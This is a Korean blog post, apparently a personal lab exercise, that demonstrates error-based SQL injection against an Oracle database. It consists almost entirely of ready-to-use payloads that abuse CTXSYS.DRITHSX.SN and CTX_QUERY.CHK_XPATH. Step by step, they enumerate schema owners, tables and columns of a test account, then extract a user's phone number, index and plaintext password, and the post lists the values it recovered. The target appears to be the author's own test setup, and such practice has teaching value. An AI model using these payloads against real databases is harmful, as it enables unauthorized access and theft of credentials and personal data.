์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

Oracle database ๊ณต๊ฒฉ ์‹ค์Šต

  • -
๋ฐ˜์‘ํ˜•
CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))
CTXSYS.CTX_QUERY.CHK_XPATH((SELECT user FROM dual),1)

 

์ƒˆ๋กœ์šด ์‚ฌ์šฉ์ž , ํ…Œ์ด๋ธ”, ์ปฌ๋Ÿผ, ๋ฐ์ดํ„ฐ ํ™•์ธ



1. ์ƒˆ๋กœ์šด ์‚ฌ์šฉ์ž ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=1))
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=2))
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=3))
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=4))
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=5))
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=6))
CTXSYS.DRITHSX.SN(1,(SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE r=7))

์ƒˆ๋กœ์šด ์‚ฌ์šฉ์ž : C##TEST ํ™•์ธ

2. ์ƒˆ๋กœ์šด ํ…Œ์ด๋ธ” ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT table_name FROM (SELECT rownum r, table_name FROM all_tables WHERE owner='C##TEST') WHERE r=1))

์ƒˆ๋กœ์šด ํ…Œ์ด๋ธ” : TEST1 ํ™•์ธ

3. ์ƒˆ๋กœ์šด ์ปฌ๋Ÿผ ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT column_name FROM (SELECT rownum r, column_name FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1') WHERE r=1))
CTXSYS.DRITHSX.SN(1,(SELECT column_name FROM (SELECT rownum r, column_name FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1') WHERE r=2))
CTXSYS.DRITHSX.SN(1,(SELECT column_name FROM (SELECT rownum r, column_name FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1') WHERE r=3))
CTXSYS.DRITHSX.SN(1,(SELECT column_name FROM (SELECT rownum r, column_name FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1') WHERE r=4))

์ƒˆ๋กœ์šด ์ปฌ๋Ÿผ : PHONE ํ™•์ธ

4. ์ƒˆ๋กœ์šด ๋ฐ์ดํ„ฐ ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT id FROM (SELECT rownum r,id FROM C##TEST.test1) WHERE r=1))
CTXSYS.DRITHSX.SN(1,(SELECT id FROM (SELECT rownum r,id FROM C##TEST.test1) WHERE r=2))
CTXSYS.DRITHSX.SN(1,(SELECT id FROM (SELECT rownum r,id FROM C##TEST.test1) WHERE r=3))

์ƒˆ๋กœ์šด ๋ฐ์ดํ„ฐ : test ํ™•์ธ

5. ์ƒˆ๋กœ์šด ๋ฐ์ดํ„ฐ test ๋ชจ๋“  ์ •๋ณด ํ™•์ธ
# ํœด๋Œ€ํฐ ๋ฒˆํ˜ธ ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT phone FROM (SELECT rownum r,phone FROM C##TEST.test1 WHERE id='test') WHERE r=1))

# IDX ๋ฒˆํ˜ธ ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT idx FROM (SELECT rownum r,idx FROM C##TEST.test1 WHERE id='test') WHERE r=1))

# PW ๋ฒˆํ˜ธ ํ™•์ธ
CTXSYS.DRITHSX.SN(1,(SELECT pw FROM (SELECT rownum r,pw FROM C##TEST.test1 WHERE id='test') WHERE r=1))

ํœด๋Œ€ํฐ ๋ฒˆํ˜ธ : 010-9876-5432 ํ™•์ธ
IDX ๋ฒˆํ˜ธ : 3 ํ™•์ธ
pw ๋ฒˆํ˜ธ : 1q2w3e4r ํ™•์ธ

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Oracle Blind Based  (0) 2022.07.06
ORACLE Union Based  (0) 2022.07.06
ORACLE INJECTION  (0) 2022.07.05
Blind Injection -2  (0) 2022.07.04
Blind Injection -1  (0) 2022.07.01
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.